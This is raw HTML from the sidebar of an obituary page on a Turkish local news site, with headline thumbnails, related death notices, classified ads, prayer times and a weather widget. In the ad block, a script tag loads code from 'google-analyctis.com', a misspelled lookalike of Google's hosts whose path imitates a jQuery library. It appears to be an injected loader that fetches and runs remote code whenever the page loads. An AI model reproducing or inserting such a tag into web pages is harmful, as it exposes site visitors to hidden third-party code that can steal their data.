value="34721f4cdfedd8241fa682003e7660661fc75e18" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/vefatlar/ahmet-kirik-74-yasinda-h68826.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <div class="gazeteler"> <div id="carousel-gazeteler" class="carousel gazeteler slide"> <div class="box header black"> <h5 class="glyphicons bookmark" style="text-align:left;">GAZETE MANŞETLERİ</h5> <!-- <div class="pull-right"> <ol class="carousel-indicators"> <li data-target="#carousel-gazeteler" data-slide-to="0" class="active"></li> <li data-target="#carousel-gazeteler" data-slide-to="1"></li> <li data-target="#carousel-gazeteler" data-slide-to="2"></li> <li data-target="#carousel-gazeteler" data-slide-to="3"></li> <li data-target="#carousel-gazeteler" data-slide-to="4"></li> <li data-target="#carousel-gazeteler" data-slide-to="5"></li> <li data-target="#carousel-gazeteler" data-slide-to="6"></li> </ol> </div> --> </div> <div class="box content"> <div class="carousel-inner"> <div class="item active"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/aksam" title="Akşam" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/aksam.jpg" alt="Akşam"/></div> <p>Akşam</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/dirilis-postasi" title="Diriliş Postası" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/dirilis-postasi.jpg" alt="Diriliş Postası"/></div> <p>Diriliş Postası</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dunya" title="Dünya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/dunya.jpg" alt="Dünya"/></div> <p>Dünya</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dogru-haber" title="Doğru Haber" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/dogru-haber.jpg" alt="Doğru Haber"/></div> <p>Doğru Haber</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/karar" title="Karar" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/karar.jpg" alt="Karar"/></div> <p>Karar</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/korkusuz" title="Korkusuz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/korkusuz.jpg" alt="Korkusuz"/></div> <p>Korkusuz</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/milli-gazete" title="Milli Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/milli-gazete.jpg" alt="Milli Gazete"/></div> <p>Milli Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/sozcu" title="Sözcü" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/sozcu.jpg" alt="Sözcü"/></div> <p>Sözcü</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkiye-gazetesi" title="Türkiye" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/turkiye-gazetesi.jpg" alt="Türkiye"/></div> <p>Türkiye</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkgun" title="Türkgün" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/turkgun.jpg" alt="Türkgün"/></div> <p>Türkgün</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-akit" title="Yeni Akit" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/yeni-akit.jpg" alt="Yeni Akit"/></div> <p>Yeni Akit</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yenicag" title="Yeniçağ" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/yenicag.jpg" alt="Yeniçağ"/></div> <p>Yeniçağ</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-safak" title="Yeni Şafak" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/yeni-safak.jpg" alt="Yeni Şafak"/></div> <p>Yeni Şafak</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milat" title="Milat" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/milat.jpg" alt="Milat"/></div> <p>Milat</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/aydinlik-gazetesi" title="Aydınlık" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-12-29//thumbs-150/aydinlik-gazetesi.jpg" alt="Aydınlık"/></div> <p>Aydınlık</p> </a> </div> </div> </div> </div> <a class="fl_ carousel-control left" href="#carousel-gazeteler" data-slide="prev">&lsaquo;</a> <a class="fl_ carousel-control right" href="#carousel-gazeteler" data-slide="next">&rsaquo;</a> </div> </div> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/mustafa-altintop-52-yasinda-h68827.html" title="Mustafa Altıntop 52 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/mustafa_altintop_52_yasinda_h68827_e5ded.jpg" alt="Mustafa Altıntop 52 yaşında" /> <span>Mustafa Altıntop 52 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/nuh-mavi-h68825.html" title="Nuh Mavi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/nuh_mavi_h68825_f5aa6.jpg" alt="Nuh Mavi" /> <span>Nuh Mavi</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/tebernus-picak-78-yasinda-h68823.html" title="Tebernuş Pıçak 78 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/tebernus_picak_78_yasinda_h68823_0a3e2.jpg" alt="Tebernuş Pıçak 78 yaşında" /> <span>Tebernuş Pıçak 78 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-pasa-ve-hatice-h68822.html" title="Vefat - Teşekkür / Paşa ve Hatice"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/vefat_tesekkur_pasa_ve_hatice_h68822_b0a9c.jpg" alt="Vefat - Teşekkür / Paşa ve Hatice" /> <span>Vefat - Teşekkür / Paşa ve Hatice</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-esme-kaya-h68821.html" title="Vefat - Teşekkür / Esme Kaya"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/vefat_tesekkur_esme_kaya_h68821_3cc95.jpg" alt="Vefat - Teşekkür / Esme Kaya" /> <span>Vefat - Teşekkür / Esme Kaya</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/ali-kilinc-72-yasinda-h68817.html" title="Ali Kılınç 72 yaşında,"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/ali_kilinc_72_yasinda_h68817_51c3a.jpg" alt="Ali Kılınç 72 yaşında," /> <span>Ali Kılınç 72 yaşında,</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/muhsin-kok-h68816.html" title="Muhsin Kök"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/muhsin_kok_h68816_fdd8a.jpg" alt="Muhsin Kök" /> <span>Muhsin Kök</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/harun-mihci-51-yasinda-h68815.html" title="Harun Mıhçı 51 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/harun_mihci_51_yasinda_h68815_34487.jpg" alt="Harun Mıhçı 51 yaşında" /> <span>Harun Mıhçı 51 yaşında</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13422.html" title="Satilik daire" >Satilik daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13422.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satilik daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/tecrubeli-bayan-satis-elemani-13418.html" title="tecrübeli bayan satış elemanı" >tecrübeli bayan satış elemanı</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/tecrubeli-bayan-satis-elemani-13418.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="tecrübeli bayan satış elemanı" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/tecrubeli-bayan-eleman-13417.html" title="TECRÜBELİ BAYAN ELEMAN" >TECRÜBELİ BAYAN ELEMAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/tecrubeli-bayan-eleman-13417.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="TECRÜBELİ BAYAN ELEMAN" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ilkokul-ogrencilerine-ozel-ders-13414.html" title="İLKOKUL ÖĞRENCİLERİNE ÖZEL DERS" >İLKOKUL ÖĞRENCİLERİNE ÖZEL DERS</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ilkokul-ogrencilerine-ozel-ders-13414.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İLKOKUL ÖĞRENCİLERİNE ÖZEL DERS" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/acil-satilik-mustakil-2-katli-genis-ev-13407.html" title="ACİL SATILIK MÜSTAKİL 2 KATLI GENİŞ EV" >ACİL SATILIK MÜSTAKİL 2 KATLI GENİŞ EV</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/acil-satilik-mustakil-2-katli-genis-ev-13407.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/69b2722378c63a18fae8cd7d6dfc856a2dbcb08c.jpg" alt="ACİL SATILIK MÜSTAKİL 2 KATLI GENİŞ EV" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13387.html" title="Satılık iş yeri 110m2" >Satılık iş yeri 110m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13387.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/a36bae27685b37301a2ed83b619f036c5978ce60.jpg" alt="Satılık iş yeri 110m2" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13386.html" title="Satılık iş yeri 110m2" >Satılık iş yeri 110m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13386.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/edddcfaf4edaa2ed1a4c8d65958ff81413fd25aa.jpg" alt="Satılık iş yeri 110m2" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13385.html" title="Satılık iş yeri 110m2" >Satılık iş yeri 110m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-110m2-13385.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/e61706f70d6c2b78d04c1b82285a4e2bf0759207.jpg" alt="Satılık iş yeri 110m2" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/pinarbasi-mahallesinde-satlik-daire-13370.html" title="Pinarbasi mahallesinde satlik daire" >Pinarbasi mahallesinde satlik daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/pinarbasi-mahallesinde-satlik-daire-13370.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Pinarbasi mahallesinde satlik daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-31-daire-13368.html" title="Kiralık 3+1 DAİRE" >Kiralık 3+1 DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-31-daire-13368.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/1597f39e27e91f9c76bcc506874258bcdf5dee42.jpg" alt="Kiralık 3+1 DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-luks-daire-13359.html" title="Satlık lüks daire" >Satlık lüks daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-luks-daire-13359.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satlık lüks daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/makine-muhendisi-is-ariyorum-13358.html" title="Makine mühendisi iş arıyorum" >Makine mühendisi iş arıyorum</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/makine-muhendisi-is-ariyorum-13358.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Makine mühendisi iş arıyorum" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-ev-13356.html" title="KİRALIK EV" >KİRALIK EV</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-ev-13356.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK EV" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-satilik-tarla-13350.html" title="Sahibinden satilik tarla" >Sahibinden satilik tarla</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-satilik-tarla-13350.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Sahibinden satilik tarla" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesinde-kiralik-13349.html" title="Şahin tepesinde kiralık" >Şahin tepesinde kiralık</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesinde-kiralik-13349.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Şahin tepesinde kiralık" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="https://facebook.com/elbistaninsesi" target="blank" id="likes">40.3B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="https://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="https://twitter.com/elbistaninsesi" target="blank" id="followers">95</a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="https://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>06:13</td> <td>07:40</td> <td>12:39</td> <td>15:08</td> <td>17:29</td> <td>18:51</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/silahli-kavgada-yaralanan-elbistanli-genc-hayatini-kaybetti-h68664.html" title="Silahlı kavgada yaralanan Elbistanlı..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/silahli_kavgada_yaralanan_elbistanli_genc_hayatini_kaybetti_h68664_9ffcb.jpg" alt="Silahlı kavgada yaralanan Elbistanlı..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/silahli-kavgada-yaralanan-elbistanli-genc-hayatini-kaybetti-h68664.html" title="" ><span class="en-hit">1.</span> <strong>Silahlı kavgada yaralanan Elbistanlı...</strong> <span class="en-spot en-hidden">Çalışmak için gittiği İstanbul’da çıkan kavgada silahla vurulan...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/otomobil-ucuruma-yuvarlandi-baba-oldu-oglu-yaralandi-h68780.html" title="Otomobil uçuruma yuvarlandı: baba..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/otomobil_ucuruma_yuvarlandi_baba_oldu_oglu_yaralandi_h68780_daed4.jpg" alt="Otomobil uçuruma yuvarlandı: baba..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/otomobil-ucuruma-yuvarlandi-baba-oldu-oglu-yaralandi-h68780.html" title="" ><span class="en-hit">2.</span> <strong>Otomobil uçuruma yuvarlandı: baba...</strong> <span class="en-spot en-hidden">Elbistan’dan kayısı almak için Malatya’nın Darende ilçesine giden...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/gocugun-oldugu-bolgeden-ilk-goruntuler-ve-detaylar-h68798.html" title="Göçüğün olduğu bölgeden ilk..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/gocugun_oldugu_bolgeden_ilk_goruntuler_ve_detaylar_h68798_786bf.jpg" alt="Göçüğün olduğu bölgeden ilk..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/gocugun-oldugu-bolgeden-ilk-goruntuler-ve-detaylar-h68798.html" title="" ><span class="en-hit">3.</span> <strong>Göçüğün olduğu bölgeden ilk...</strong> <span class="en-spot en-hidden">Afşin-Elbistan Linyitleri (AEL) kömür sahasının, hafriyat döküm...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanin-yeni-sehir-mezarliginin-yeri-belli-oldu-h68575.html" title="Elbistanın yeni şehir mezarlığının..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/elbistanin_yeni_sehir_mezarliginin_yeri_belli_oldu_h68575_adbc9.jpg" alt="Elbistanın yeni şehir mezarlığının..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanin-yeni-sehir-mezarliginin-yeri-belli-oldu-h68575.html" title="" ><span class="en-hit">4.</span> <strong>Elbistan’ın yeni şehir mezarlığının...</strong> <span class="en-spot en-hidden">Elbistan’da Gariplik ve Hocazade Mezarlıkları’nın dolmaya yaklaşmasıyla...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ramazan-bozkurt-49-yasinda-h68554.html" title="Ramazan Bozkurt 49 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/ramazan_bozkurt_49_yasinda_h68554_a1160.jpg" alt="Ramazan Bozkurt 49 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ramazan-bozkurt-49-yasinda-h68554.html" title="" ><span class="en-hit">5.</span> <strong>Ramazan Bozkurt 49 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html" title="Fethi Çelenk 76 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/fethi_celenk_76_yasinda_h68794_ffb18.jpg" alt="Fethi Çelenk 76 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html" title="" ><span class="en-hit">1.</span> <strong>Fethi Çelenk 76 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/cazip-yekta-h68654.html" title="Cazip Yekta" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/cazip_yekta_h68654_8d700.jpg" alt="Cazip Yekta"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/cazip-yekta-h68654.html" title="" ><span class="en-hit">2.</span> <strong>Cazip Yekta</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/huseyin-gunes-64-yasinda-h68726.html" title="Hüseyin Güneş 64 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/huseyin_gunes_64_yasinda_h68726_d8933.jpg" alt="Hüseyin Güneş 64 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/huseyin-gunes-64-yasinda-h68726.html" title="" ><span class="en-hit">3.</span> <strong>Hüseyin Güneş 64 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ali-katkaya-88-yasinda-h68727.html" title="Ali Katkaya 88 yaşında" class="en-left"><img 